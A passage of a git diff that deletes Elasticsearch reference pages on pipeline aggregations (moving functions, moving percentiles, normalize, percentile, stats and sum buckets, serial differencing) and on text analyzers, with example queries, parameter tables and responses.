-setting. Small values make the weight decay slowly, which provides greater smoothing and takes into account a larger -portion of the window. Larger values make the weight decay quickly, which reduces the impact of older values on the -moving average. This tends to make the moving average track the data more closely but with less smoothing. - -`null` and `NaN` values are ignored; the average is only calculated over the real values. If the window is empty, or all values are -`null`/`NaN`, `NaN` is returned as the result. This means that the count used in the average calculation is count of non-`null`,non-`NaN` -values. - -[[ewma-params]] -.`ewma(double[] values, double alpha)` Parameters -[options="header"] -|=== -|Parameter Name |Description -|`values` |The window of values to find the sum of -|`alpha` |Exponential decay -|=== - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_movavg": { - "moving_fn": { - "buckets_path": "the_sum", - "window": 10, - "script": "MovingFunctions.ewma(values, 0.3)" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - - -==== holt Function - -The `holt` function (aka "double exponential") incorporates a second exponential term which -tracks the data's trend. Single exponential does not perform well when the data has an underlying linear trend. The -double exponential model calculates two values internally: a "level" and a "trend". - -The level calculation is similar to `ewma`, and is an exponentially weighted view of the data. The difference is -that the previously smoothed value is used instead of the raw value, which allows it to stay close to the original series. -The trend calculation looks at the difference between the current and last value (e.g. the slope, or trend, of the -smoothed data). The trend value is also exponentially weighted. - -Values are produced by multiplying the level and trend components. - -`null` and `NaN` values are ignored; the average is only calculated over the real values. If the window is empty, or all values are -`null`/`NaN`, `NaN` is returned as the result. This means that the count used in the average calculation is count of non-`null`,non-`NaN` -values. - -[[holt-params]] -.`holt(double[] values, double alpha)` Parameters -[options="header"] -|=== -|Parameter Name |Description -|`values` |The window of values to find the sum of -|`alpha` |Level decay value -|`beta` |Trend decay value -|=== - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_movavg": { - "moving_fn": { - "buckets_path": "the_sum", - "window": 10, - "script": "MovingFunctions.holt(values, 0.3, 0.1)" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -In practice, the `alpha` value behaves very similarly in `holtMovAvg` as `ewmaMovAvg`: small values produce more smoothing -and more lag, while larger values produce closer tracking and less lag. The value of `beta` is often difficult -to see. Small values emphasize long-term trends (such as a constant linear trend in the whole series), while larger -values emphasize short-term trends. - -==== holtWinters Function - -The `holtWinters` function (aka "triple exponential") incorporates a third exponential term which -tracks the seasonal aspect of your data. This aggregation therefore smooths based on three components: "level", "trend" -and "seasonality". - -The level and trend calculation is identical to `holt` The seasonal calculation looks at the difference between -the current point, and the point one period earlier. - -Holt-Winters requires a little more handholding than the other moving averages. You need to specify the "periodicity" -of your data: e.g. if your data has cyclic trends every 7 days, you would set `period = 7`. Similarly if there was -a monthly trend, you would set it to `30`. There is currently no periodicity detection, although that is planned -for future enhancements. - -`null` and `NaN` values are ignored; the average is only calculated over the real values. If the window is empty, or all values are -`null`/`NaN`, `NaN` is returned as the result. This means that the count used in the average calculation is count of non-`null`,non-`NaN` -values. - -[[holtwinters-params]] -.`holtWinters(double[] values, double alpha)` Parameters -[options="header"] -|=== -|Parameter Name |Description -|`values` |The window of values to find the sum of -|`alpha` |Level decay value -|`beta` |Trend decay value -|`gamma` |Seasonality decay value -|`period` |The periodicity of the data -|`multiplicative` |True if you wish to use multiplicative holt-winters, false to use additive -|=== - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_movavg": { - "moving_fn": { - "buckets_path": "the_sum", - "window": 10, - "script": "if (values.length > 5*2) {MovingFunctions.holtWinters(values, 0.3, 0.1, 0.1, 5, false)}" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -[WARNING] -====== -Multiplicative Holt-Winters works by dividing each data point by the seasonal value. This is problematic if any of -your data is zero, or if there are gaps in the data (since this results in a divid-by-zero). To combat this, the -`mult` Holt-Winters pads all values by a very small amount (1*10^-10^) so that all values are non-zero. This affects -the result, but only minimally. If your data is non-zero, or you prefer to see `NaN` when zero's are encountered, -you can disable this behavior with `pad: false` -====== - -===== "Cold Start" - -Unfortunately, due to the nature of Holt-Winters, it requires two periods of data to "bootstrap" the algorithm. This -means that your `window` must always be *at least* twice the size of your period. An exception will be thrown if it -isn't. It also means that Holt-Winters will not emit a value for the first `2 * period` buckets; the current algorithm -does not backcast. - -You'll notice in the above example we have an `if ()` statement checking the size of values. This is checking to make sure -we have two periods worth of data (`5 * 2`, where 5 is the period specified in the `holtWintersMovAvg` function) before calling -the holt-winters function. diff --git a/docs/reference/aggregations/pipeline/moving-percentiles-aggregation.asciidoc b/docs/reference/aggregations/pipeline/moving-percentiles-aggregation.asciidoc deleted file mode 100644 index 50b099d8e16..00000000000 --- a/docs/reference/aggregations/pipeline/moving-percentiles-aggregation.asciidoc +++ /dev/null @@ -1,165 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[search-aggregations-pipeline-moving-percentiles-aggregation]] -=== Moving percentiles aggregation -++++ -Moving percentiles -++++ - -Given an ordered series of <>, the Moving Percentile aggregation -will slide a window across those percentiles and allow the user to compute the cumulative percentile. - -This is conceptually very similar to the <> pipeline aggregation, -except it works on the percentiles sketches instead of the actual buckets values. - -==== Syntax - -A `moving_percentiles` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "moving_percentiles": { - "buckets_path": "the_percentile", - "window": 10 - } -} --------------------------------------------------- -// NOTCONSOLE - -[[moving-percentiles-params]] -.`moving_percentiles` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |Path to the percentile of interest (see <> for more details |Required | -|`window` |The size of window to "slide" across the histogram. |Required | -|`shift` |<> of window position. |Optional | 0 -|=== - -`moving_percentiles` aggregations must be embedded inside of a `histogram` or `date_histogram` aggregation. They can be -embedded like any other metric aggregation: - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { <1> - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_percentile": { <2> - "percentiles": { - "field": "price", - "percents": [ 1.0, 99.0 ] - } - }, - "the_movperc": { - "moving_percentiles": { - "buckets_path": "the_percentile", <3> - "window": 10 - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> A `date_histogram` named "my_date_histo" is constructed on the "timestamp" field, with one-day intervals -<2> A `percentile` metric is used to calculate the percentiles of a field. -<3> Finally, we specify a `moving_percentiles` aggregation which uses "the_percentile" sketch as its input. - -Moving percentiles are built by first specifying a `histogram` or `date_histogram` over a field. You then add -a percentile metric inside of that histogram. Finally, the `moving_percentiles` is embedded inside the histogram. -The `buckets_path` parameter is then used to "point" at the percentiles aggregation inside of the histogram (see -<> for a description of the syntax for `buckets_path`). - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "my_date_histo": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "the_percentile": { - "values": { - "1.0": 150.0, - "99.0": 200.0 - } - } - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "the_percentile": { - "values": { - "1.0": 10.0, - "99.0": 50.0 - } - }, - "the_movperc": { - "values": { - "1.0": 150.0, - "99.0": 200.0 - } - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "the_percentile": { - "values": { - "1.0": 175.0, - "99.0": 200.0 - } - }, - "the_movperc": { - "values": { - "1.0": 10.0, - "99.0": 200.0 - } - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -The output format of the `moving_percentiles` aggregation is inherited from the format of the referenced -<> aggregation. - -Moving percentiles pipeline aggregations always run with `skip` gap policy. - - -[[moving-percentiles-shift-parameter]] -==== shift parameter - -By default (with `shift = 0`), the window that is offered for calculation is the last `n` values excluding the current bucket. -Increasing `shift` by 1 moves starting window position by `1` to the right. - -- To include current bucket to the window, use `shift = 1`. -- For center alignment (`n / 2` values before and after the current bucket), use `shift = window / 2`. -- For right alignment (`n` values after the current bucket), use `shift = window`. - -If either of window edges moves outside the borders of data series, the window shrinks to include available values only. diff --git a/docs/reference/aggregations/pipeline/normalize-aggregation.asciidoc b/docs/reference/aggregations/pipeline/normalize-aggregation.asciidoc deleted file mode 100644 index 80cc0c3db11..00000000000 --- a/docs/reference/aggregations/pipeline/normalize-aggregation.asciidoc +++ /dev/null @@ -1,185 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[search-aggregations-pipeline-normalize-aggregation]] -=== Normalize aggregation -++++ -Normalize -++++ - -A parent pipeline aggregation which calculates the specific normalized/rescaled value for a specific bucket value. -Values that cannot be normalized, will be skipped using the <>. - -==== Syntax - -A `normalize` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "normalize": { - "buckets_path": "normalized", - "method": "percent_of_sum" - } -} --------------------------------------------------- -// NOTCONSOLE - -[[normalize_pipeline-params]] -.`normalize_pipeline` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |The path to the buckets we wish to normalize (see <> for more details) |Required | -|`method` | The specific <> to apply | Required | -|`format` |format to apply to the output value of this aggregation |Optional |`null` -|=== - -==== Methods -[[normalize_pipeline-method]] - -The Normalize Aggregation supports multiple methods to transform the bucket values. Each method definition will use -the following original set of bucket values as examples: `[5, 5, 10, 50, 10, 20]`. - -_rescale_0_1_:: - This method rescales the data such that the minimum number is zero, and the maximum number is 1, with the rest normalized - linearly in-between. - - x' = (x - min_x) / (max_x - min_x) - - [0, 0, .1111, 1, .1111, .3333] - -_rescale_0_100_:: - This method rescales the data such that the minimum number is zero, and the maximum number is 100, with the rest normalized - linearly in-between. - - x' = 100 * (x - min_x) / (max_x - min_x) - - [0, 0, 11.11, 100, 11.11, 33.33] - -_percent_of_sum_:: - This method normalizes each value so that it represents a percentage of the total sum it attributes to. - - x' = x / sum_x - - [5%, 5%, 10%, 50%, 10%, 20%] - - -_mean_:: - This method normalizes such that each value is normalized by how much it differs from the average. - - x' = (x - mean_x) / (max_x - min_x) - - [4.63, 4.63, 9.63, 49.63, 9.63, 9.63, 19.63] - -_zscore_:: - This method normalizes such that each value represents how far it is from the mean relative to the standard deviation - - x' = (x - mean_x) / stdev_x - - [-0.68, -0.68, -0.39, 1.94, -0.39, 0.19] - -_softmax_:: - This method normalizes such that each value is exponentiated and relative to the sum of the exponents of the original values. - - x' = e^x / sum_e_x - - [2.862E-20, 2.862E-20, 4.248E-18, 0.999, 9.357E-14, 4.248E-18] - - -==== Example - -The following snippet calculates the percent of total sales for each month: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - }, - "percent_of_total_sales": { - "normalize": { - "buckets_path": "sales", <1> - "method": "percent_of_sum", <2> - "format": "00.00%" <3> - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> `buckets_path` instructs this normalize aggregation to use the output of the `sales` aggregation for rescaling -<2> `method` sets which rescaling to apply. In this case, `percent_of_sum` will calculate the sales value as a percent of all sales - in the parent bucket -<3> `format` influences how to format the metric as a string using Java's `DecimalFormat` pattern. In this case, multiplying by 100 - and adding a '%' - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "sales": { - "value": 550.0 - }, - "percent_of_total_sales": { - "value": 0.5583756345177665, - "value_as_string": "55.84%" - } - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "sales": { - "value": 60.0 - }, - "percent_of_total_sales": { - "value": 0.06091370558375635, - "value_as_string": "06.09%" - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "sales": { - "value": 375.0 - }, - "percent_of_total_sales": { - "value": 0.38071065989847713, - "value_as_string": "38.07%" - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] diff --git a/docs/reference/aggregations/pipeline/percentiles-bucket-aggregation.asciidoc b/docs/reference/aggregations/pipeline/percentiles-bucket-aggregation.asciidoc deleted file mode 100644 index d3a492536ef..00000000000 --- a/docs/reference/aggregations/pipeline/percentiles-bucket-aggregation.asciidoc +++ /dev/null @@ -1,134 +0,0 @@ -[[search-aggregations-pipeline-percentiles-bucket-aggregation]] -=== Percentiles bucket aggregation -++++ -Percentiles bucket -++++ - -A sibling pipeline aggregation which calculates percentiles across all bucket of a specified metric in a sibling aggregation. -The specified metric must be numeric and the sibling aggregation must be a multi-bucket aggregation. - -==== Syntax - -A `percentiles_bucket` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "percentiles_bucket": { - "buckets_path": "the_sum" - } -} --------------------------------------------------- -// NOTCONSOLE - -[[percentiles-bucket-params]] -.`percentiles_bucket` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |The path to the buckets we wish to find the percentiles for (see <> for more - details) |Required | -|`gap_policy` |The policy to apply when gaps are found in the data (see <> for more - details)|Optional | `skip` -|`format` |format to apply to the output value of this aggregation |Optional | `null` -|`percents` |The list of percentiles to calculate |Optional | `[ 1, 5, 25, 50, 75, 95, 99 ]` -|`keyed` |Flag which returns the range as an hash instead of an array of key-value pairs |Optional | `true` -|=== - -The following snippet calculates the percentiles for the total monthly `sales` buckets: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - } - } - }, - "percentiles_monthly_sales": { - "percentiles_bucket": { - "buckets_path": "sales_per_month>sales", <1> - "percents": [ 25.0, 50.0, 75.0 ] <2> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> `buckets_path` instructs this percentiles_bucket aggregation that we want to calculate percentiles for -the `sales` aggregation in the `sales_per_month` date histogram. -<2> `percents` specifies which percentiles we wish to calculate, in this case, the 25th, 50th and 75th percentiles. - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "sales": { - "value": 550.0 - } - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "sales": { - "value": 60.0 - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "sales": { - "value": 375.0 - } - } - ] - }, - "percentiles_monthly_sales": { - "values" : { - "25.0": 375.0, - "50.0": 375.0, - "75.0": 550.0 - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -==== Percentiles_bucket implementation - -The Percentile Bucket returns the nearest input data point that is not greater than the requested percentile; it does not -interpolate between data points. - -The percentiles are calculated exactly and is not an approximation (unlike the Percentiles Metric). This means -the implementation maintains an in-memory, sorted list of your data to compute the percentiles, before discarding the -data. You may run into memory pressure issues if you attempt to calculate percentiles over many millions of -data-points in a single `percentiles_bucket`. diff --git a/docs/reference/aggregations/pipeline/serial-diff-aggregation.asciidoc b/docs/reference/aggregations/pipeline/serial-diff-aggregation.asciidoc deleted file mode 100644 index 9909953d7c3..00000000000 --- a/docs/reference/aggregations/pipeline/serial-diff-aggregation.asciidoc +++ /dev/null @@ -1,102 +0,0 @@ -[[search-aggregations-pipeline-serialdiff-aggregation]] -=== Serial differencing aggregation -++++ -Serial differencing -++++ - -Serial differencing is a technique where values in a time series are subtracted from itself at -different time lags or periods. For example, the datapoint f(x) = f(x~t~) - f(x~t-n~), where n is the period being used. - -A period of 1 is equivalent to a derivative with no time normalization: it is simply the change from one point to the -next. Single periods are useful for removing constant, linear trends. - -Single periods are also useful for transforming data into a stationary series. In this example, the Dow Jones is -plotted over ~250 days. The raw data is not stationary, which would make it difficult to use with some techniques. - -By calculating the first-difference, we de-trend the data (e.g. remove a constant, linear trend). We can see that the -data becomes a stationary series (e.g. the first difference is randomly distributed around zero, and doesn't seem to -exhibit any pattern/behavior). The transformation reveals that the dataset is following a random-walk; the value is the -previous value +/- a random amount. This insight allows selection of further tools for analysis. - -[[serialdiff_dow]] -.Dow Jones plotted and made stationary with first-differencing -image::images/pipeline_serialdiff/dow.png[] - -Larger periods can be used to remove seasonal / cyclic behavior. In this example, a population of lemmings was -synthetically generated with a sine wave + constant linear trend + random noise. The sine wave has a period of 30 days. - -The first-difference removes the constant trend, leaving just a sine wave. The 30th-difference is then applied to the -first-difference to remove the cyclic behavior, leaving a stationary series which is amenable to other analysis. - -[[serialdiff_lemmings]] -.Lemmings data plotted made stationary with 1st and 30th difference -image::images/pipeline_serialdiff/lemmings.png[] - - - -==== Syntax - -A `serial_diff` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "serial_diff": { - "buckets_path": "the_sum", - "lag": "7" - } -} --------------------------------------------------- -// NOTCONSOLE - -[[serial-diff-params]] -.`serial_diff` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |Path to the metric of interest (see <> for more details |Required | -|`lag` |The historical bucket to subtract from the current value. E.g. a lag of 7 will subtract the current value from - the value 7 buckets ago. Must be a positive, non-zero integer |Optional |`1` -|`gap_policy` |Determines what should happen when a gap in the data is encountered. |Optional |`insert_zero` -|`format` |Format to apply to the output value of this aggregation |Optional | `null` -|=== - -`serial_diff` aggregations must be embedded inside of a `histogram` or `date_histogram` aggregation: - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { <1> - "date_histogram": { - "field": "timestamp", - "calendar_interval": "day" - }, - "aggs": { - "the_sum": { - "sum": { - "field": "lemmings" <2> - } - }, - "thirtieth_difference": { - "serial_diff": { <3> - "buckets_path": "the_sum", - "lag" : 30 - } - } - } - } - } -} --------------------------------------------------- - -<1> A `date_histogram` named "my_date_histo" is constructed on the "timestamp" field, with one-day intervals -<2> A `sum` metric is used to calculate the sum of a field. This could be any metric (sum, min, max, etc) -<3> Finally, we specify a `serial_diff` aggregation which uses "the_sum" metric as its input. - -Serial differences are built by first specifying a `histogram` or `date_histogram` over a field. You can then optionally -add normal metrics, such as a `sum`, inside of that histogram. Finally, the `serial_diff` is embedded inside the histogram. -The `buckets_path` parameter is then used to "point" at one of the sibling metrics inside of the histogram (see -<> for a description of the syntax for `buckets_path`. diff --git a/docs/reference/aggregations/pipeline/stats-bucket-aggregation.asciidoc b/docs/reference/aggregations/pipeline/stats-bucket-aggregation.asciidoc deleted file mode 100644 index ba72b2533ea..00000000000 --- a/docs/reference/aggregations/pipeline/stats-bucket-aggregation.asciidoc +++ /dev/null @@ -1,120 +0,0 @@ -[[search-aggregations-pipeline-stats-bucket-aggregation]] -=== Stats bucket aggregation -++++ -Stats bucket -++++ - -A sibling pipeline aggregation which calculates a variety of stats across all bucket of a specified metric in a sibling aggregation. -The specified metric must be numeric and the sibling aggregation must be a multi-bucket aggregation. - -==== Syntax - -A `stats_bucket` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "stats_bucket": { - "buckets_path": "the_sum" - } -} --------------------------------------------------- -// NOTCONSOLE - -[[stats-bucket-params]] -.`stats_bucket` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |The path to the buckets we wish to calculate stats for (see <> for more - details) |Required | -|`gap_policy` |The policy to apply when gaps are found in the data (see <> for more - details)|Optional | `skip` -|`format` |format to apply to the output value of this aggregation |Optional | `null` -|=== - -The following snippet calculates the stats for monthly `sales`: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - } - } - }, - "stats_monthly_sales": { - "stats_bucket": { - "buckets_path": "sales_per_month>sales" <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> `bucket_paths` instructs this `stats_bucket` aggregation that we want the calculate stats for the `sales` aggregation in the -`sales_per_month` date histogram. - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "sales": { - "value": 550.0 - } - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "sales": { - "value": 60.0 - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "sales": { - "value": 375.0 - } - } - ] - }, - "stats_monthly_sales": { - "count": 3, - "min": 60.0, - "max": 550.0, - "avg": 328.3333333333333, - "sum": 985.0 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] diff --git a/docs/reference/aggregations/pipeline/sum-bucket-aggregation.asciidoc b/docs/reference/aggregations/pipeline/sum-bucket-aggregation.asciidoc deleted file mode 100644 index e0075471772..00000000000 --- a/docs/reference/aggregations/pipeline/sum-bucket-aggregation.asciidoc +++ /dev/null @@ -1,117 +0,0 @@ -[[search-aggregations-pipeline-sum-bucket-aggregation]] -=== Sum bucket aggregation -++++ -Sum bucket -++++ - - -A sibling pipeline aggregation which calculates the sum across all buckets of a specified metric in a sibling aggregation. -The specified metric must be numeric and the sibling aggregation must be a multi-bucket aggregation. - -==== Syntax - -A `sum_bucket` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "sum_bucket": { - "buckets_path": "the_sum" - } -} --------------------------------------------------- -// NOTCONSOLE - -[[sum-bucket-params]] -.`sum_bucket` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |The path to the buckets we wish to find the sum for (see <> for more - details) |Required | - |`gap_policy` |The policy to apply when gaps are found in the data (see <> for more - details)|Optional | `skip` - |`format` |format to apply to the output value of this aggregation |Optional |`null` -|=== - -The following snippet calculates the sum of all the total monthly `sales` buckets: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - } - } - }, - "sum_monthly_sales": { - "sum_bucket": { - "buckets_path": "sales_per_month>sales" <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> `buckets_path` instructs this sum_bucket aggregation that we want the sum of the `sales` aggregation in the -`sales_per_month` date histogram. - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "sales": { - "value": 550.0 - } - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "sales": { - "value": 60.0 - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "sales": { - "value": 375.0 - } - } - ] - }, - "sum_monthly_sales": { - "value": 985.0 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] diff --git a/docs/reference/analysis.asciidoc b/docs/reference/analysis.asciidoc deleted file mode 100644 index 15684f60a88..00000000000 --- a/docs/reference/analysis.asciidoc +++ /dev/null @@ -1,61 +0,0 @@ -[[analysis]] -= Text analysis - -:lucene-analysis-docs: https://lucene.apache.org/core/{lucene_version_path}/analyzers-common/org/apache/lucene/analysis -:lucene-stop-word-link: https://github.com/apache/lucene-solr/blob/master/lucene/analysis/common/src/resources/org/apache/lucene/analysis - -[partintro] --- - -_Text analysis_ is the process of converting unstructured text, like -the body of an email or a product description, into a structured format that's -optimized for search. - -[discrete] -[[when-to-configure-analysis]] -=== When to configure text analysis - -{es} performs text analysis when indexing or searching <> fields. - -If your index doesn't contain `text` fields, no further setup is needed; you can -skip the pages in this section. - -However, if you use `text` fields or your text searches aren't returning results -as expected, configuring text analysis can often help. You should also look into -analysis configuration if you're using {es} to: - -* Build a search engine -* Mine unstructured data -* Fine-tune search for a specific language -* Perform lexicographic or linguistic research - -[discrete] -[[analysis-toc]] -=== In this section - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - --- - -include::analysis/overview.asciidoc[] - -include::analysis/concepts.asciidoc[] - -include::analysis/configure-text-analysis.asciidoc[] - -include::analysis/analyzers.asciidoc[] - -include::analysis/tokenizers.asciidoc[] - -include::analysis/tokenfilters.asciidoc[] - -include::analysis/charfilters.asciidoc[] - -include::analysis/normalizers.asciidoc[] \ No newline at end of file diff --git a/docs/reference/analysis/analyzers.asciidoc b/docs/reference/analysis/analyzers.asciidoc deleted file mode 100644 index 15e8fb435f2..00000000000 --- a/docs/reference/analysis/analyzers.asciidoc +++ /dev/null @@ -1,71 +0,0 @@ -[[analysis-analyzers]] -== Built-in analyzer reference - -Elasticsearch ships with a wide range of built-in analyzers, which can be used -in any index without further configuration: - -<>:: - -The `standard` analyzer divides text into terms on word boundaries, as defined -by the Unicode Text Segmentation algorithm. It removes most punctuation, -lowercases terms, and supports removing stop words. - -<>:: - -The `simple` analyzer divides text into terms whenever it encounters a -character which is not a letter. It lowercases all terms. - -<>:: - -The `whitespace` analyzer divides text into terms whenever it encounters any -whitespace character. It does not lowercase terms. - -<>:: - -The `stop` analyzer is like the `simple` analyzer, but also supports removal -of stop words. - -<>:: - -The `keyword` analyzer is a ``noop'' analyzer that accepts whatever text it is -given and outputs the exact same text as a single term. - -<>:: - -The `pattern` analyzer uses a regular expression to split the text into terms. -It supports lower-casing and stop words. - -<>:: - -Elasticsearch provides many language-specific analyzers like `english` or -`french`. - -<>:: - -The `fingerprint` analyzer is a specialist analyzer which creates a -fingerprint which can be used for duplicate detection. - -[discrete] -=== Custom analyzers - -If you do not find an analyzer suitable for your needs, you can create a -<> analyzer which combines the appropriate -<>, -<>, and <>. - - -include::analyzers/fingerprint-analyzer.asciidoc[] - -include::analyzers/keyword-analyzer.asciidoc[] - -include::analyzers/lang-analyzer.asciidoc[] - -include::analyzers/pattern-analyzer.asciidoc[] - -include::analyzers/simple-analyzer.asciidoc[] - -include::analyzers/standard-analyzer.asciidoc[] - -include::analyzers/stop-analyzer.asciidoc[] - -include::analyzers/whitespace-analyzer.asciidoc[] \ No newline at end of file diff --git a/docs/reference/analysis/analyzers/configuring.asciidoc b/docs/reference/analysis/analyzers/configuring.asciidoc deleted file mode 100644 index c848004c4f0..00000000000 --- a/docs/reference/analysis/analyzers/configuring.asciidoc +++ /dev/null @@ -1,94 +0,0 @@ -[[configuring-analyzers]] -=== Configuring built-in analyzers - -The built-in analyzers can be used directly without any configuration. Some -of them, however, support configuration options to alter their behaviour. For -instance, the <> can be configured -to support a list of stop words: - -[source,console] --------------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "std_english": { <1> - "type": "standard", - "stopwords": "_english_" - } - } - } - }, - "mappings": { - "properties": { - "my_text": { - "type": "text", - "analyzer": "standard", <2> - "fields": { - "english": { - "type": "text", - "analyzer": "std_english" <3> - } - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "field": "my_text", <2> - "text": "The old brown cow" -} - -POST my-index-000001/_analyze -{ - "field": "my_text.english", <3> - "text": "The old brown cow" -} - --------------------------------- - -<1> We define the `std_english` analyzer to be based on the `standard` - analyzer, but configured to remove the pre-defined list of English stopwords. -<2> The `my_text` field uses the `standard` analyzer directly, without - any configuration. No stop words will be removed from this field. - The resulting terms are: `[ the, old, brown, cow ]` -<3> The `my_text.english` field uses the `std_english` analyzer, so - English stop words will be removed. The resulting terms are: - `[ old, brown, cow ]` - - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "old", - "start_offset": 4, - "end_offset": 7, - "type": "", - "position": 1 - }, - { - "token": "brown", - "start_offset": 8, - "end_offset": 13, - "type": "", - "position": 2 - }, - { - "token": "cow", - "start_offset": 14, - "end_offset": 17, - "type": "", - "position": 3 - } - ] -} ----------------------------- - -///////////////////// diff --git a/docs/reference/analysis/analyzers/custom-analyzer.asciidoc 